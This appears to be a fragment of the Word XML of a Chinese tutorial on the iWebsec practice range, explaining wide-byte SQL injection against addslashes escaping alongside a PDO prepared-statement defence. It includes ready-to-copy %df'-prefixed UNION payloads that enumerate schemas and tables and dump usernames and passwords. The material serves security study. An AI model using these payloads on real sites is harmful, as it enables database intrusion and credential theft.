          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>拦截注入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。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45357995" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E9628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预编译语句示例（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）：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72908C1F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8D92F6" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282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安全写法，彻底杜绝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注入</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>$id = $_GET['id'];</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br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pdo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new PDO("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mysql:host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=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localhost;dbname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=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iwebsec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", "root", "root");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预处理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，用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>占位符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stmt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pdo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-&gt;prepare("SELECT * FROM news WHERE id = ? </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>LIMIT 0,1");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绑定参数，仅作为数据传入，无法篡改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逻辑</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br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stmt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-&gt;execute([$id]);</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>$row = 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stmt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-&gt;</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>fetch(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r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60860E39" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="005D0D0E">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="464939AB" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*****</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iWebsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>靶场字符型注入宽字节绕过及排错方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B17916" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t>🔍</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>现象深度分析（字符型注入核心验证）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355C9AF3" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t>你执行的</w:t>
      </w:r>
      <w:r>
        <w:t>Payload</w:t>
      </w:r>
      <w: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5A3C9E47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6F78ED" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
            <w:r>
              <w:t>Plain Text</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>?id=1' and '1'='2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="19968FD9" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t>现象：页面正常返回了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> id=1 </w:t>
      </w:r>
      <w:r>
        <w:t>的原始数据（</w:t>
      </w:r>
      <w:r>
        <w:t>1 | user1 | pass1</w:t>
      </w:r>
      <w:r>
        <w:t>），而非预期的空白</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>无数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367C692C" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="005D0D0E"/>
    <w:p w14:paraId="36575C72" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t>一、后端</w:t>
      </w:r>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:t>拼接与语法解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7B6AF1" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>标准字符型注入的预期逻辑</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B35BAD" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t>后端</w:t>
      </w:r>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SELECT * FROM news WHERE id = '$id' LIMIT 0,1</w:t>
      </w:r>
      <w:r>
        <w:t>，输入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ?id=1' and '1'='2 </w:t>
      </w:r>
      <w:r>
        <w:t>后，正确拼接应为：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3F2E53FC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DAE3D1" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
            <w:r>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>SELECT * FROM news WHERE id = '1' and '1'='2' LIMIT 0,1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="061AC539" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t>条件</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> '1'='2' </w:t>
      </w:r>
      <w:r>
        <w:t>永假，页面应无数据返回，这是字符型注入的金标准。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432893F3" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t>你当前场景的实际逻辑（关键差异）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B0BF15" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t>页面正常返回数据，说明</w:t>
      </w:r>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:t>语法未按预期执行，核心原因只有一种：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0862C91E" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t>输入的单引号被后端转义</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>过滤，导致闭合失效，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:t>逻辑未生效</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B787BBB" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t>实际拼接后的</w:t>
      </w:r>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w: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4E46CE27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9341D3" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
            <w:r>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>SELECT * FROM news WHERE id = '1\' and \'1\'=\'2' LIMIT 0,1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C128B42" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t>后端用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>addslashes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql_real_escape_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:r>
        <w:t>对所有单引号做了转义，添加了反斜杠</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671923B6" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t>转义后的单引号失去闭合能力，整个输入被当作字符串</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1' and '1'='2</w:t>
      </w:r>
      <w:r>
        <w:t>，而非</w:t>
      </w:r>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:t>逻辑</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F8F861" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t>数据库执</w:t>
      </w:r>
      <w:r>
        <w:t>行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> id = '1' and '1'='2'</w:t>
      </w:r>
      <w:r>
        <w:t>，无匹配数据，但靶场做了容错处理，回退到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> id=1 </w:t>
      </w:r>
      <w:r>
        <w:t>的默认数据，因此页面正常显示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281B9E8D" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="005D0D0E"/>
    <w:p w14:paraId="0705A3D9" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t>二、</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">100% </w:t>
      </w:r>
      <w:r>
        <w:t>确认字符型注入的终极验证（直接执行）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB3EFE7" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t>核心验证</w:t>
      </w:r>
      <w:r>
        <w:t>Payload</w:t>
      </w:r>
      <w:r>
        <w:t>（绕过转义</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>确认闭合）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3760EB86" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t xml:space="preserve">① </w:t>
      </w:r>
      <w:r>
        <w:t>宽字节注入测试（针对</w:t>
      </w:r>
      <w:r>
        <w:t>GBK</w:t>
      </w:r>
      <w:r>
        <w:t>编码，最常见的转义绕过方法）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36C006A1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DFEC7A" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
            <w:r>
              <w:t>Plain Text</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>?id=1%df' and '1'='2 --+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F3619F7" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t>原理：</w:t>
      </w:r>
      <w:bookmarkStart w:id="32" w:name="_GoBack"/>
      <w:r>
        <w:t>GBK</w:t>
      </w:r>
      <w:r>
        <w:t>编码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
      <w:r>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> %df%5c </w:t>
      </w:r>
      <w:r>
        <w:t>是合法汉字，吃掉转义符</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> \</w:t>
      </w:r>
      <w:r>
        <w:t>，成功闭合单引号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19970B62" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t>预期结果：页面无数据返回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → 100% </w:t>
      </w:r>
      <w:r>
        <w:t>确认字符型注入，转义被绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD16F2A" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t xml:space="preserve">② </w:t>
      </w:r>
      <w:r>
        <w:t>注释符测试（确认单引号闭合）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09D9ED01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8D7A94" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
            <w:r>
              <w:t>Plain Text</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>?id=1' --+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="705E8EA3" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t>预期结果：页面正常返回数据</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:t>单引号闭合成功，注释符生效</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274BC33E" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t>若正常返回，说明转义被绕过，可执行后续注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2EAE46" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="005D0D0E"/>
    <w:p w14:paraId="362E1697" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t>三、适配本场景的字符型注入完整</w:t>
      </w:r>
      <w:r>
        <w:t>Payload</w:t>
      </w:r>
      <w:r>
        <w:t>（宽字节绕过版）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EB9E5E" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t>列数猜解（确认</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>列）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5D0D0E" w14:paraId="626D7B3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2D1753" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Plain Text</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>?id=1%df' order by 3 --+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="415D622A" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:r>
        <w:t>2. UNION</w:t>
      </w:r>
      <w:r>
        <w:t>注入全流程（直接复制可用）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4"/>
      </w:tblGrid>
      <w:tr w:rsidR="005D0D0E" w14:paraId="5DB237DA" w14:textId="77777777" w:rsidTr="004A1A82">
        <w:trPr>
          <w:trHeight w:val="3125"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8304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D9B594" w14:textId="77777777" w:rsidR="004A1A82" w:rsidRDefault="00E96282">
            <w:r>
              <w:t>Plain Text</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve"># 1. </w:t>
            </w:r>
            <w:r>
              <w:t>获取当前数据库名</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A5ACE3C" w14:textId="77777777" w:rsidR="004A1A82" w:rsidRDefault="00E96282">
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">?id=-1%df' </w:t>
            </w:r>
            <w:r>
              <w:t>union select 1,</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>2,database</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>() --+</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FAE1FA3" w14:textId="77777777" w:rsidR="004A1A82" w:rsidRDefault="00E96282">
            <w:r>
              <w:br/>
              <w:t xml:space="preserve"># 2. </w:t>
            </w:r>
            <w:r>
              <w:t>获取所有数据库名</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CC64544" w14:textId="5682E94A" w:rsidR="004A1A82" w:rsidRDefault="00E96282">
            <w:r>
              <w:br/>
              <w:t>?id=-1%df' union select 1,</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>2,group</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>_concat(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>schema_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">) from </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>information_schema.schemata</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> --+</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve"># 3. </w:t>
            </w:r>
            <w:r>
              <w:t>获取</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>iwebsec</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>库所有表名</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60A52029" w14:textId="65FA3F93" w:rsidR="004A1A82" w:rsidRPr="004A1A82" w:rsidRDefault="00E96282">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidR="004A1A82" w:rsidRPr="004A1A82">
              <w:t>?id=-1%df' union select 1,</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="004A1A82" w:rsidRPr="004A1A82">
              <w:t>2,group</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="004A1A82" w:rsidRPr="004A1A82">
              <w:t>_concat(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="004A1A82" w:rsidRPr="004A1A82">
              <w:t>table_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="004A1A82" w:rsidRPr="004A1A82">
              <w:t xml:space="preserve">) from </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="004A1A82" w:rsidRPr="004A1A82">
              <w:t>information_schema.tables</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="004A1A82" w:rsidRPr="004A1A82">
              <w:t xml:space="preserve"> where </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="004A1A82" w:rsidRPr="004A1A82">
              <w:t>table_schema</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="004A1A82" w:rsidRPr="004A1A82">
              <w:t>=0x69776562736563 --+</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DB8BC14" w14:textId="77777777" w:rsidR="004A1A82" w:rsidRDefault="00E96282">
            <w:r>
              <w:br/>
              <w:t xml:space="preserve"># 4. </w:t>
            </w:r>
            <w:r>
              <w:t>获取</w:t>
            </w:r>
            <w:r>
              <w:t>users</w:t>
            </w:r>
            <w:r>
              <w:t>表所有列名</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="196151CB" w14:textId="246B84FC" w:rsidR="004A1A82" w:rsidRPr="004A1A82" w:rsidRDefault="00E96282">
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidR="004A1A82" w:rsidRPr="004A1A82">
              <w:t>?id=-1%df' union select 1,</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="004A1A82" w:rsidRPr="004A1A82">
              <w:t>2,group</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="004A1A82" w:rsidRPr="004A1A82">
              <w:t>_concat(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="004A1A82" w:rsidRPr="004A1A82">
              <w:t>column_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="004A1A82" w:rsidRPr="004A1A82">
              <w:t xml:space="preserve">) from </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="004A1A82" w:rsidRPr="004A1A82">
              <w:t>information_schema.columns</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="004A1A82" w:rsidRPr="004A1A82">
              <w:t xml:space="preserve"> where </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="004A1A82" w:rsidRPr="004A1A82">
              <w:t>table_schema</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="004A1A82" w:rsidRPr="004A1A82">
              <w:t xml:space="preserve">=0x69776562736563 and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="004A1A82" w:rsidRPr="004A1A82">
              <w:t>table_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="004A1A82" w:rsidRPr="004A1A82">
              <w:t>=0x7573657273 --+</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17D6BE21" w14:textId="77777777" w:rsidR="004A1A82" w:rsidRDefault="00E96282">
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve"># 5. </w:t>
            </w:r>
            <w:r>
              <w:t>获取</w:t>
            </w:r>
            <w:r>
              <w:t>users</w:t>
            </w:r>
            <w:r>
              <w:t>表账号密码</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13F219E1" w14:textId="054F02BF" w:rsidR="005D0D0E" w:rsidRPr="004A1A82" w:rsidRDefault="00E96282">
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidR="004A1A82" w:rsidRPr="004A1A82">
              <w:t>?id=-1%df' union select 1,</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="004A1A82" w:rsidRPr="004A1A82">
              <w:t>2,group</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="004A1A82" w:rsidRPr="004A1A82">
              <w:t xml:space="preserve">_concat(username,0x3a,password) from </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="004A1A82" w:rsidRPr="004A1A82">
              <w:t>iwebsec.users</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="004A1A82" w:rsidRPr="004A1A82">
              <w:t xml:space="preserve"> --+</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B08C820" w14:textId="2448B26F" w:rsidR="004A1A82" w:rsidRDefault="004A1A82"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="569C4B0E" w14:textId="4329151B" w:rsidR="005D0D0E" w:rsidRDefault="005D0D0E"/>
    <w:p w14:paraId="2EB06B76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>为什么你原来的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会报错？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4117531A" w14:textId="77777777" w:rsidR="004A1A82" w:rsidRDefault="004A1A82" w:rsidP="004A1A82">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>iwebsec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宽字节注入关卡：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DBDFFE" w14:textId="77777777" w:rsidR="004A1A82" w:rsidRDefault="004A1A82" w:rsidP="004A1A82"/>
    <w:p w14:paraId="2C2CDB0E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开启了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magic_quotes_gpc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或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addslashes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转义</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDC8260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输入的单引号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会被变成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> \'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598271FE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宽字节</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> %df </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>能吃掉反斜杠</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但后面跟的字符串单引号依然会被转义</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5C044C" w14:textId="77777777" w:rsidR="004A1A82" w:rsidRDefault="004A1A82" w:rsidP="004A1A82"/>
    <w:p w14:paraId="711DCE71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>所以：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F85C88D" w14:textId="77777777" w:rsidR="004A1A82" w:rsidRDefault="004A1A82" w:rsidP="004A1A82"/>
    <w:p w14:paraId="6A6B9AAB" w14:textId="77777777" w:rsidR="004A1A82" w:rsidRDefault="004A1A82" w:rsidP="004A1A82">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iwebsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报错</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D197CF8" w14:textId="77777777" w:rsidR="004A1A82" w:rsidRDefault="004A1A82" w:rsidP="004A1A82">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">=0x69776562736563 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
